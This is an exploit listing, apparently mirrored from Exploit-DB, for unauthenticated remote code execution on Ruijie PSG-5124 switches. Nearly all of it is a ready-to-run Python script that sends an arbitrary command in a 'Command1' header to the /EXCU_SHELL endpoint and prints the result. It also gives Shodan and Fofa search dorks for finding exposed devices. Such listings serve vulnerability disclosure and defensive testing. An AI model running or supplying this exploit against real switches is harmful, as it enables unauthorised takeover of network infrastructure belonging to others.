Share
## https://sploitus.com/exploit?id=EDB-ID:51888
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
import http.client
import argparse
def send_request(ip, port, command):
headers = {
"Host": f"{ip}:{port}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"DNT": "1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Cmdnum": "1",
"Confirm1": "n",
"Content-Length": "0",
"Command1": command
}
try:
connection = http.client.HTTPConnection(f"{ip}:{port}")
connection.request("GET", "/EXCU_SHELL", headers=headers)
response = connection.getresponse()
print(f"Status Code: {response.status}")
print(response.read().decode('utf-8'))
connection.close()
except Exception as e:
print(f"Request failed: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
parser.add_argument('--ip', help='Target IP address', required=True)
parser.add_argument('--port', help='Port', required=True)
parser.add_argument('--cmd', help='Command', required=True)
args = parser.parse_args()
ip = args.ip
port = args.port
command = args.cmd
send_request(ip, port, command)